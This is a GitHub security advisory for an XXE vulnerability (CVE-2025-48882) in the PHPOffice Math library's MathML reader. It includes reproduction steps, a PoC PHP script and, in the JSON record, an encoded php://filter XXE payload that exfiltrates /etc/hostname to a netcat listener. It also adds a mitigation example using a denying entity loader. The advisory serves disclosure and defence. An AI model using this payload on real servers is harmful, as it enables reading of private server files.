ghsa-42hm-pq2f-3r7m
Vulnerability from github
Published
2025-05-29 17:27
Modified
2025-05-30 21:42
Summary
PHPOffice Math allows XXE when processing an XML file in the MathML format
Details

Product: Math
Version: 0.2.0
CWE-ID: CWE-611: Improper Restriction of XML External Entity Reference
CVSS vector v.4.0: 8.7 (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)
CVSS vector v.3.1: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
Description: An attacker can craft a special XML file; while it is processed, external entities are loaded, which makes it possible to read local server files.
Impact: Reading of local server files
Vulnerable component: The loadXML call with the unsafe LIBXML_DTDLOAD flag in the MathML reader class (src/Math/Reader/MathML.php)
Exploitation conditions: The vulnerability applies only to reading a file in the MathML format.
Mitigation: If the LIBXML_DTDLOAD flag cannot be dropped, filter external entities by implementing a custom external entity loader (libxml_set_external_entity_loader).
Researcher: Aleksandr Zhurnakov (Positive Technologies)

Research

A zero-day vulnerability was discovered in the Math library during detailed research into XXE vulnerabilities in PHP. Loading XML data with the standard libxml extension and the LIBXML_DTDLOAD flag, without additional filtering, leads to XXE.

Below are steps to reproduce the vulnerability.

  1. Preparation:
     - The payload was tested on PHP versions >= 8.1.
     - The composer manager is used to install the latest version of the Math library.
     - PHP has to be configured with Zlib support.
     - The necessary requirements for the Math library must be installed.
     - The netcat utility is used to demonstrate exfiltration.

  2. Make the math directory and move into it:

     ```
     mkdir math && cd math
     ```

  3. Install the latest version of the library (Figure 1):

     ```
     composer require phpoffice/math
     ```

     Figure 1. Installing the library

  4. Create the poc.xml file (Listing 1):

     Listing 1. Creating poc.xml

     ```xml
     <foo></foo>
     ```

  5. Create the math.php file (Listing 2):

     Listing 2. Creating math.php

     ```php
     <?php
     require_once "./vendor/autoload.php";

     // MathML::read() hands the document to loadXML() with LIBXML_DTDLOAD,
     // so the external DTD referenced by poc.xml is fetched while parsing.
     $reader = new \PhpOffice\Math\Reader\MathML();
     $reader->read(
         file_get_contents('poc.xml')
     );
     ```

  6. The payload (see step 4) is set to exfiltrate the /etc/hostname file through http://127.0.0.1:9999/, so a listening socket is started on port 9999 (Figure 2).

     Figure 2. Launching the listening socket

  7. Execute the PHP script from the console:

     ```
     php math.php
     ```

     6 characters from the /etc/hostname file will be exfiltrated to port 9999 in base64 format (Figure 3).

     Figure 3. Characters exfiltration

     Decode the received data from base64, dropping the last M character (an artifact of the payload) (Figure 4).

     Figure 4. Data decoding

  8. By changing the payload, the remaining part of the file can be received.
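An added example, written for this page rather than taken from the project or the advisory author, showing the mitigation named under Details and the load that the reproduction steps rely on: a custom loader registered with libxml_set_external_entity_loader intercepts every external resource that a DOCTYPE like the one in poc.xml makes libxml fetch when loadXML runs with LIBXML_DTDLOAD. It calls DOMDocument::loadXML directly with that flag instead of going through the MathML reader, and the sample document and the DTD path inside it are constructed placeholders.

```php
<?php
// Added example (not PHPOffice/Math code): LIBXML_DTDLOAD makes libxml fetch the
// external DTD named in a DOCTYPE; a custom external entity loader that returns
// null denies every such fetch, which is the CWE-611 mitigation from the advisory.

// Constructed sample document; the DTD path is a placeholder, any file:// or
// php:// URI would be requested through the same loader hook.
$sample = <<<'XML'
<?xml version="1.0"?>
<!DOCTYPE math SYSTEM "file:///tmp/placeholder-external.dtd" []>
<math xmlns="http://www.w3.org/1998/Math/MathML"><mi>x</mi></math>
XML;

// Registers a loader that records each requested URI and refuses it.
function installDenyingEntityLoader(array &$attempts): void
{
    libxml_set_external_entity_loader(
        function (?string $publicId, string $systemId, array $context) use (&$attempts) {
            $attempts[] = $systemId;
            return null; // "not found": nothing is read from disk or the network
        }
    );
}

// Parses with the same unsafe flag the vulnerable reader uses.
function parseWithDtdLoad(string $xml): bool
{
    $dom = new DOMDocument();
    $previous = libxml_use_internal_errors(true);
    $ok = $dom->loadXML($xml, LIBXML_DTDLOAD);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    return $ok;
}

$attempts = [];
installDenyingEntityLoader($attempts);
$ok = parseWithDtdLoad($sample);

// The document itself may still parse (a missing external subset is only a
// warning); what matters is that every external URI was intercepted and denied.
echo $ok ? "document parsed\n" : "document rejected\n";
foreach ($attempts as $uri) {
    echo "blocked external load of: {$uri}\n";
}

// Restore libxml's default loader once the protected parse is finished.
libxml_set_external_entity_loader(null);
```

The same hook also covers php://filter and data: URIs, which the default loader would otherwise resolve through PHP's stream wrappers.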

Credits

Aleksandr Zhurnakov (Positive Technologies)



{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.2.0"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/math"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-48882"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-05-29T17:27:39Z",
    "nvd_published_at": "2025-05-30T20:15:43Z",
    "severity": "HIGH"
  },
  "details": "**Product:** Math\n**Version:** 0.2.0\n**CWE-ID:** CWE-611: Improper Restriction of XML External Entity Reference\n**CVSS vector v.4.0:** 8.7 (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)\n**CVSS vector v.3.1:** 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n**Description:** An attacker can create a special XML file, during which it processed, external entities are loaded, and it\u2019s possible to read local server files.  \n**Impact:** Local server files reading\n**Vulnerable component:** The [`loadXML`](https://github.com/PHPOffice/Math/blob/c3ecbf35601e2a322bf2ddba48589d79ac827b92/src/Math/Reader/MathML.php#L38C9-L38C55) function with the unsafe [`LIBXML_DTDLOAD`](https://www.php.net/manual/en/libxml.constants.php#constant.libxml-dtdload) flag, the [`MathML`](https://github.com/PHPOffice/Math/blob/master/src/Math/Reader/MathML.php) class\n**Exploitation conditions:** The vulnerability applies only to reading a file in the `MathML` format.\n**Mitigation:** If there is no option to refuse using the [`LIBXML_DTDLOAD`](https://www.php.net/manual/en/libxml.constants.php#constant.libxml-dtdload) flag, it\u2019s recommended to filter external entities through the implementation of the [`custom external entity loader function`](https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php).\n**Researcher: Aleksandr Zhurnakov (Positive Technologies)**\n\n## Research\nZero-day vulnerability was discovered in the [Math](https://github.com/PHPOffice/Math) library in the detailed process of the XXE vulnerability research in PHP.\nLoading XML data, using the standard [`libxml`](https://www.php.net/manual/en/book.libxml.php) extension and the [`LIBXML_DTDLOAD`](https://www.php.net/manual/en/libxml.constants.php#constant.libxml-dtdload) flag without additional filtration, leads to XXE.\n\nBelow are steps to reproduce the vulnerability.\n\n1. 
Preparation:\n\n- The payload was tested on the PHP versions \u003e= 8.1.\n- The [composer](https://getcomposer.org/) manager is used to install the latest version of the Math library.\n- PHP has to be configurated with [Zlib](https://www.php.net/manual/ru/book.zlib.php) support.\n- The necessary [requirements](https://github.com/PHPOffice/Math?tab=readme-ov-file#requirements) for the Math library must be installed.\n- The `netcat` utility is used for demonstration exfiltration.\n\n2. Make `math` directory and then moving into it.\n````\nmkdir math \u0026\u0026 cd math\n````\n\n3. Install the latest actual version of the library (Figure 1). \n```\ncomposer require phpoffice/math\n````\n_Figure 1. Installing the library_\n\u003cimg width=\"630\" alt=\"fig2\" src=\"https://github.com/user-attachments/assets/bb0c6781-4f5a-411c-970d-9402e652ad87\" /\u003e\n\n4. Create `poc.xml` file (Listing 1): \n\n_Listing 1. Creating `poc.xml`_\n```\nxml     \n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e     \u003c!DOCTYPE x SYSTEM 
\n\"php://filter/convert.base64-\ndecode/zlib.inflate/resource=data:,7Ztdb9owFIbv%2bRVZJ9armNjOZ2k7QUaL%2bRYO2nqFUn\nBFNQaMptP272cnNFuTsBbSskg1iATZzvGxn/ccX3A4fdfoecS7UsrK1A98hV5Rr9FVjlaz1UmlcnM7D9i\n6MlkufrB1AK79O2bqKltMllMWt96KL6ADwci7sJ4Yu0vr9/tlwKbqan27CPzrOXvevFGrbRvOGIseaCa7\nTAxok1x44xahXzQEcdKPKZPevap3RZw920I0VscWGLlU1efPsy0c5cbV1AoI7ZuOMCZW12nkcP9Q2%2bQ\nObBNmL6ajg8s6xJqmJTrq5NIArX6zVk8Zcwwt4fPuLvHnbeBSvpdIQ6g93MvUv3CHqKNrmtEW4EYmCr5g\nDT5QzyNWE4x6xO1/aqQmgMhGYgaVDFUnScKltbFnaJoKHRuHK0L1pIkuaYselMe9cPUqRmm5C51u00kkh\ny1S3aBougkl7e4d6RGaTYeSehdCjAG/O/p%2bYfKyQsoLmgdlmsFYQFDjh6GWJyGE0ZfMX08EZtwNTdAY\nud7nLcksnwppA2UnqpCzgyDo1QadAU3vLOQZ82EHMxAi0KVcq7rzas5xD6AQoeqkYkgk02abukkJ/z%2b\nNvkj%2bjUy16Ba5d/S8anhBLwt44EgGkoFkIBlIBpKBZCAZSAaSgWQgGUgGkoFkIBlIBpKBZCAZSAaSgW\nQgGUgGxWOwW2nF7kt%2by7/Kb3ag2GUTUgBvXAAxiKxt4Is3sB4WniVrOvhwzB0CXerg5GN9esGRQv7Rg\nQdMmMO9sIwtc/sIJUOCsY4ee7f7FIWu2Si4euKan8wg58nFsEIXxYGntgZqMog3Z2FrgPhgyzIOlsmijo\nwqwb0jyMqMoGEbarqdOpP/iqFISMkSVFG1Z5p8f3OK%2bxAZ7gClpgUPg70rq0T2RIkcup/0newQ7NbcU\nXv/DPl4LL/N7hdfn2dp07pmd8v79YSdVVgwqcyWd8HC/8aOzkunf6r%2b2c8bpSxK/6uPmlf%2br/nSny\nrHcduH99iqKiz7HwLxTLMgEM0QWUDjb3ji8NdHPslZmV%2bqR%2bfH56Xyxni1VGbV0m8=\" \n[]\u003e\u003cfoo\u003e\u003c/foo\u003e\n```\n5. Create `math.php` file (Listing 2): \n\n*Listing 2. Creating `math.php`*\n````\n\u003c?php\n    require_once \"./vendor/autoload.php\";\n\n    $reader = new \\PhpOffice\\Math\\Reader\\MathML();\n    $reader-\u003eread(\n        file_get_contents(\u0027poc.xml\u0027)\n    );\n````\n6. The payload (see the step 4) is set to exfiltrate the `/etc/hostname` file through `http://127.0.0.1:9999/`, so the listening socket is launched at the `9999` port (Figure 2)\n\n_Figure 2. Launching the listening socket_\n\u003cimg width=\"550\" alt=\"fig2\" src=\"https://github.com/user-attachments/assets/6da5b966-70be-4e3e-9bde-c6baf4dfef34\" /\u003e\n\n7. 
Execute php-script via console: \n````\nphp math.php \n````\n\n6 characters from the `/etc/hostname` file will be exfiltrated to the `9999` port in base64 format (Figure 3). \n\n_Figure 3. Characters exfiltration_\n\u003cimg width=\"520\" alt=\"fig3\" src=\"https://github.com/user-attachments/assets/f0eae873-d156-442f-ab08-12dd94a8dbe9\" /\u003e\n\nDecode the received data from base64 removing the last `M` character (the payload feature) (Figure 4).\n\n*Figure 4. Data decoding*\n\u003cimg width=\"595\" alt=\"fig4\" src=\"https://github.com/user-attachments/assets/7a091a07-7856-41a0-b1bd-3d8009303ced\" /\u003e\n\n8. By changing the payload, the remaining file can be received. \n\n## Credits\nAleksandr Zhurnakov (Positive Technologies)",
  "id": "GHSA-42hm-pq2f-3r7m",
  "modified": "2025-05-30T21:42:11Z",
  "published": "2025-05-29T17:27:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/Math/security/advisories/GHSA-42hm-pq2f-3r7m"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48882"
    },
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/Math/commit/fc31c8f57a7a81f962cbf389fd89f4d9d06fc99a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/PHPOffice/Math"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "PHPOffice Math allows XXE when processing an XML file in the MathML format "
}

